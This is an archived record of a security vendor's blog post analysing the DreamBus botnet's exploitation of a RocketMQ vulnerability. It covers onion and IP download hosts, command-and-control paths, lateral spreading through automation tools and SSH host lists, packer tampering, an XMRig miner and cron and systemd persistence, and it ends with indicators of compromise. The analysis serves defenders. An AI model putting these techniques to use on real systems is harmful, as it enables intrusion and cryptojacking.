{
	"id": "57adf11b-286c-4d4e-84ff-3542143c45df",
	"created_at": "2026-04-06T01:31:37.196288Z",
	"updated_at": "2026-04-10T03:24:18.126025Z",
	"deleted_at": null,
	"sha1_hash": "7cb22a620b8d7f6bb40d570c5b7e4188e316a682",
	"title": "DreamBus Botnet Resurfaces, Targets RocketMQ vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1447003,
	"plain_text": "DreamBus Botnet Resurfaces, Targets RocketMQ vulnerability\r\nBy Paul Kimayong\r\nPublished: 2023-08-28 · Archived: 2026-04-06 00:39:42 UTC\r\nDreamBus Botnet Resurfaces, Targets RocketMQ vulnerability\r\nAugust 28, 2023\r\nIn May 2023, a vulnerability affecting RocketMQ servers (CVE-2023-33246), which allows remote code\r\nexecution, was publicly disclosed. In a recent blog post, Juniper Threat Labs provided a detailed explanation of\r\nhow an exploit targeting this vulnerability works.\r\nThis vulnerability opened the gates for hackers to exploit the RocketMQ platform, leading to a series of attacks. In\r\nfact, Juniper Threat Labs has detected multiple attacks where threat actors took advantage of the vulnerability to\r\ninfiltrate systems and subsequently install the malicious DreamBus bot, a malware strain last seen in 2021.\r\nIn this blog post, we delve into the details of the attacks and the bot.\r\nAttack Timeline\r\nIn early June, as shown above in Fig. 1, we began seeing attacks targeting this RocketMQ vulnerability. The\r\nattacks reached a peak in volume towards mid-June. While the default port for RocketMQ is 10911 (depicted in\r\ngreen in the figure above), it is worth noting that the attacks targeted at least seven other ports.\r\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 1 of 11\n\nFig. 1: Timeline of Recent RocketMQ attacks Observed by Juniper Threat Labs.\r\nInterestingly, the initial attacks were non-destructive in nature.  Rather than do damage, malicious threat actors\r\nemployed an open-source reconnaissance tool called ‘interactsh’ to assess server vulnerabilities.  Gathering\r\ninformation like this demonstrates their ability to probe without relying on their own infrastructure. This method\r\nallows hackers to collect valuable reconnaissance data.\r\nFig. 2: Attacks employing interactsh.\r\nFig. 3: Webpage of one interactsh server describing the tool.\r\nStarting on June 19th, we detected a series of attacks that involved downloading and executing a malicious bash\r\nscript named, “reketed”. As it happens, on that same day, we also observed malicious threat actors using two\r\ndifferent methods to retrieve and execute this malicious shell script.  In one (refer to Fig. 4 below), the threat\r\nactors made use of the TOR onion router web traffic service via a TOR proxy service called, “tor2web.in”. (Note\r\nthat use of this TOR proxy allows for the anonymous downloading of malicious payloads without the presence of\r\nthe actual TOR browser client on the victim’s system). In the other, cybercriminals called for the retrieval and\r\nexecution of the malicious “reketed” payload form a specific IP address, 92[.]204.243.155 on port 8080 (refer to\r\nFig. 5 below).\r\nFig. 4: Attack directly using TOR proxy service tor2web.in to download the payload.\r\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 2 of 11\n\nFig. 5: Attack showing threat actors using IP address 92[.]204.243.155 to download the payload.\r\nReketed: Downloader Bash Script\r\nUpon successful exploitation, the payload will execute the bash script named ‘reketed’ (hash:\r\n1d0c3e35324273ffeb434f929f834b59dcc6cdd24e9204abd32cc0abefd9f047). Interestingly, at the time of our\r\nanalysis here at Juniper Threat Labs, this file had no detections in VirusTotal (VT) as you can see below in Fig. 6.\r\nFig. 6: VT shows zero (0) anti-malware vendors detected malicious ”reketed” bash script.\r\nThe primary function of the reketed bash shell script is to download the DreamBus main module from a TOR\r\nhidden service, “ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion”. When run, the\r\nmalicious reketed bash shell script downloads the DreamBus main module, which is an ELF binary file, and\r\ninstalls it. The script assigns it a 20-character filename.  To determine the filename, the script uses the first 20\r\ncharacters of the 32-character md5 checksum performed on the current date (i.e., date|md5sum|head -c20).\r\nIn our analysis, the reketed bash script exhibits some obfuscation techniques, with randomized names assigned to\r\nfunctions and variables. However, after fixing the variables, the script becomes intelligible and thus more readily\r\nanalyzed.   See the contents of the reketed script after being deobfuscated in Fig. 7 below.\r\nOnce the DreamBus main module is successfully downloaded, “reketed” script promptly executes the ELF binary\r\nand subsequently deletes it,  adding a layer of complexity to potential forensic investigations.\r\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 3 of 11\n\nFig. 7: Reketed script after fixing the structure and renaming the variables.\r\nDreamBus Main Module\r\nThe sha256sum of the downloaded main module is\r\n601a2ff4a7244ed41dda1c1fc71b10d3cfefa34e2ef8ba71598f41f73c031443. At the time of our analysis, the\r\nmalicious DreamBus main module – like the reketed malicious shell script – showed no detections in VirusTotal\r\n(as shown in Fig. 8 below).\r\nThe DreamBus main module is an ELF Linux binary that has been packed with UPX, but with modified headers\r\nand footers that make unpacking more challenging. With this simple trick by the malware authors, the out-of-the-box UPX tool cannot unpack it (refer to Fig. 9 below). This will also make static detection challenging as engines\r\ntypically need to unpack files first (e.g., UPX packed samples) before scanning. For this file, we needed to fix the\r\nUPX headers.  Doing so proved sufficient for the UPX tool to unpack it.\r\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 4 of 11\n\nFig. 8: VT shows zero (0) anti-malware vendors detected DreamBus main module ELF file\r\nFig. 9: Modified UPX header of the ELF binary.\r\nAfter unpacking, and upon static analysis of the DreamBus main module binary, we discovered that it executes\r\nnumerous base64 encoded strings. These encoded strings (refer to Fig. 10 and Fig. 11 below) are script files with\r\ndifferent functionalities, that include downloading other malicious modules. We will provide more details on these\r\nlater in this blog post.\r\nFig. 10: Snippet of code executing the base64 encoded shell scripts in the linux binary.\r\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 5 of 11\n\nFig. 11: Base64 encoding shell scripts in the linux binary.\r\nThese base64 encoded strings decodes into a bash script resembling the “reketed” script described earlier in this\r\nblog post. The script can perform various functions, such as downloading other modules, by sending requests to\r\nthe TOR onion service using different path names. For instance, the bot can send requests to the following paths:\r\nru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion/ping\r\nru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion/mine\r\nru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion/cmd1\r\nru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion/kill\r\nDuring our analysis, we identified several capabilities possessed by the malware. Upon executing each capability,\r\nit will send a corresponding request to the server, providing notification of the actions it has taken.\r\nRequest Description\r\n{onion site}/ping Beacon out to the server advertising that it is alive\r\n{onion site}/exec Download and execute main module\r\n{onion site}/mine Download and install a monero miner\r\n{onion site}/cmd1 Execute bash script\r\n{onion site}/cmd2 Execute a bash script while including in the request machine ID, IP, hostname\r\nAs part of the installation routine, the malware terminates processes and eliminates files associated with outdated\r\nversions of itself. Subsequently, it sends a request to {onion site/kill} to notify the server about this action.\r\nSpreader\r\nDreamBus main module also has other paths in the request like the one ending in /scan, which we are not able to\r\nverify as the request did not return anything at the time of our analysis. DreamBus expects this request to return a\r\nfile which it will install and execute. We believe this module will scan a set of external and internal IP ranges and\r\nspread via exploits as seen in previous DreamBus variants.\r\nFurthermore, the DreamBus bot malware spread laterally. The malicious threat actors leverage widely recognized\r\nIT automation tools like ansible, knife, salt and pssh (parallel ssh). They employ a Base64 encoded string\r\ncontaining shell commands to infect remote systems, facilitating the installation of the DreamBus main module.\r\nAdditionally, this function extracts hosts from the user’s bash_history, /etc/hosts file and ssh known_hosts file,\r\nfurther aiding in the spread of the malware.\r\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 6 of 11\n\nFig. 12: Snippet of code showing how the malware spread using IT automation tools and SSH.\r\nMonero Miner\r\nUpon initiating a request to the designated path\r\n“ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion”, the system successfully\r\nretrieved an open-source Monero cryptocurrency miner program called XMRig. The XMRig file’s sha256sum is\r\n1c49d7da416474135cd35a9166f2de0f8775f21a27cd47d28be48a2ce580d58d. Again, as with the DreamBus\r\nbinary, XMRig is packed with UPX and has modified headers. Once unpacked, the binary reveals its hardcoded\r\nconfiguration (refer to Fig. 13 below), which includes joining the mining pool ‘p2pool.it’ for Monero\r\ncryptocurrency mining purposes. The binary incorporates the username ‘x‘ and password ‘x‘ for authentication\r\nwithin the mining pool.\r\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 7 of 11\n\nFig. 13: Configuration of XMRig Monero cryptocurrency miner.\r\nPersistence\r\nTo ensure persistent presence, the malware employs multiple mechanisms. Firstly, it establishes a service named\r\n$HOME/.config/systemd/user/systemd-tmpfiles-cleanup. Then, a “timer service” is implemented (refer to Fig.\r\n14 below), scheduled to initiate the above service on an hourly basis.  Furthermore, a cron job (refer to Fig. 15\r\nbelow) is created and configured to execute the downloader script with the same hourly frequency. These\r\napproaches enable the threat actor to maintain their foothold consistently.\r\nFig. 14: Snippet of code that creates Timer service for persistence.\r\nFig. 15: Snippet of code that creates cron job.\r\nConclusion\r\nAs DreamBus malicious threat actors resurface, their primary objective remains the installation of a Monero\r\ncryptocurrency miner. However, the presence of a modular bot like the DreamBus malware equipped with the\r\nability to execute bash scripts provides these cybercriminals the potential to diversify their attack repertoire,\r\nincluding the installation of various other forms of malware. Their preferred means of initial access revolves\r\naround exploiting vulnerabilities, particularly recent ones that result in remote code execution like the RocketMQ\r\nvulnerability CVE-2023-33246. To protect organizations from DreamBus malware, RocketMQ and similar\r\nattacks, Juniper highly recommends implementing robust patch management processes to ensure any would-be\r\nvulnerable systems are updated in a timely manner and protected against these and an evolving set of malicious\r\nthreats.\r\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 8 of 11\n\nJuniper ATP Cloud detects this malware using Machine Learning based on static and behavioral analysis.\r\nJuniper SRX customers with an IDP license are protected against this RocketMQ vulnerability using the signature\r\nbelow (released with IDP sigpack #3604):\r\nTCP:C2S:APACHE-ROCKETMQ-UPDT-CE\r\nIndicators of Compromise\r\nIndicator Description\r\n92[.]204.243.155 Download Server\r\nru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion\r\n.onion Download and Control\r\nServer\r\n1d0c3e35324273ffeb434f929f834b59dcc6cdd24e9204abd32cc0abefd9f047 Bash script downloader\r\n1c49d7da416474135cd35a9166f2de0f8775f21a27cd47d28be48a2ce580d58d XMRig Miner\r\n601a2ff4a7244ed41dda1c1fc71b10d3cfefa34e2ef8ba71598f41f73c031443 DreamBus Bot\r\n153b0d0916bd3150c5d4ab3e14688140b34fdd34caac725533adef8f4ab621e2 DreamBus Bot\r\ne71caf456b73dade7c65662ab5cf55e02963ee3f2bfb47e5cffc1b36c0844b4d DreamBus Bot\r\n9f740c9042a7c3c03181d315d47986674c50c2fca956915318d7ca9d2a086b7f DreamBus Bot\r\n371319cd17a1ab2d3fb2c79685c3814dc24d67ced3e2f7663806e8960ff9334c DreamBus Bot\r\n21a9f094eb65256e0ea2adb5b43a85f5abfbfdf45f855daab3eb6749c6e69417 DreamBus Bot\r\n0a8779a427aba59a66338d85e28f007c6109c23d6b0a6bd4b251bf0f543a029f DreamBus Bot\r\nRelated posts\r\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 9 of 11\n\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 10 of 11\n\nSource: https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability"
	],
	"report_names": [
		"dreambus-botnet-resurfaces-targets-rocketmq-vulnerability"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439097,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7cb22a620b8d7f6bb40d570c5b7e4188e316a682.pdf",
		"text": "https://archive.orkl.eu/7cb22a620b8d7f6bb40d570c5b7e4188e316a682.txt",
		"img": "https://archive.orkl.eu/7cb22a620b8d7f6bb40d570c5b7e4188e316a682.jpg"
	}
}